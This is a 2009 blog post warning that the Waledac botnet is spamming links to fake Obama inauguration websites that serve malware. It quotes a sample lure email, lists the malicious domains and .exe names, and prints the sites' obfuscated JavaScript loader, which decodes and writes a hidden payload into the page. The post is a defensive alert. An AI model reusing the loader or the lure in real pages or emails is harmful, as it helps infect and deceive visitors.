Amazing News – Obama Refuses to be President – Virus Alert

Posted on January 19, 2009 by
1 commentLeave a comment

2994035684 fd0dc33d3f s Amazing News Obama Refuses to be President Virus AlertWith the inauguration kicking in full swing, a botnet is sending out emails pointing users to a fake Barack Obama website. These website’s contain viruses in the links. The sites also include obfuscated java script using the name google-analysis.js.

An Example Email:

From: Jessica Carson
Dates: Monday, January 19, 2009 10:09 AM
To:
Subject: Amazing News

Our new president abandoned us http://www.greatobamaonline.com

Yours Sincerely,
Jessica Carson

The pages look like the real deal:

This is the fake

fake obama 300x2171 Amazing News Obama Refuses to be President Virus Alert

This is the real one:

real obama 300x2171 Amazing News Obama Refuses to be President Virus Alert

The links in the fake pages includes (but may change):

  • barack.exe
  • speech.exe
  • file.exe
  • usa.exe

Sites that the Spam links to:

  • greatobamaguide.com
  • greatobamaonline.com
  • superobamadirect.com
  • superobamaonline.com

The Botnet is the Waledac botnet it was last seen during the big “Greating Cards” Spam.  This botnet is believed to be the left overs, or a re creation of the Storm Botnet.

Below is the Java Script if anyone wants to tear it apart…

var P51m=Array(63,55,4,19,6,15,9,39,13,24,0,0,0,0,0,0,62,57,11,18,29,32,41,26,59,43,52,48,31,2,37,54,36,30,60,50,28,61,53,22,33,7,56,0,0,0,0,42,0,49,25,27,16,8,20,14,17,0,58,23,12,3,10,35,5,1,51,40,47,38,34,46,44,45,21),urpOPjyLwOAOv7eqetJdCf2emY5SGMQB7eXHTxQj0=”u0062u0053122Ku006b63u006cSi153163u0056153u0063l165131u004f124u004au0068k1257u006e_u0073K156111u0078K156u0037l16662u0074lu0061u0036162170126u0054cUu007664I154123156147154Kiu0059170u0076Wu0042125u0076172u0031TVGMu0052u0061zO122130u0070u0047104Ju00547154u004bu0039Qu0039Klu0063u0044126u0036u0033u006cu0031114wu0078Su0042mRX143u0075Fu0076l5u0052Vu0032u006fl113cM”,PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc=0,fxAUkDWF=0,udpcgAo7TIU5pa7MHJ5cV8xAul7v8fx=0,PgattkGoK91jIak,Xnkf9=urpOPjyLwOAOv7eqetJdCf2emY5SGMQB7eXHTxQj0.length,WYPMl5TtI0ePDWHu2Gfw=1024;window.status=’ ‘;for(var IM3UUs34Fm0pR9wgrtW=Math.ceil(Xnkf9/WYPMl5TtI0ePDWHu2Gfw);IM3UUs34Fm0pR9wgrtW>0;IM3UUs34Fm0pR9wgrtW–){PgattkGoK91jIak=”;for(var Dl4P5Bm1_=Math.min(Xnkf9,WYPMl5TtI0ePDWHu2Gfw);Dl4P5Bm1_>0;Dl4P5Bm1_–,Xnkf9–){PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc|=(P51m[urpOPjyLwOAOv7eqetJdCf2emY5SGMQB7eXHTxQj0.charCodeAt(udpcgAo7TIU5pa7MHJ5cV8xAul7v8fx++)-48])<<fxAUkDWF;if(fxAUkDWF){PgattkGoK91jIak+=String.fromCharCode(165^PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc&255);PyHIG77Ej0WiDgOgWkjnI7LXNJ3Rc>>=8;fxAUkDWF-=2}else fxAUkDWF=6}document.write(PgattkGoK91jIak);}

Its related:
Categories: Nerdology | Tags: alert virus, Virus Alert
Notice: This work is licensed under a BY-NC-SA. Permalink: Amazing News – Obama Refuses to be President – Virus Alert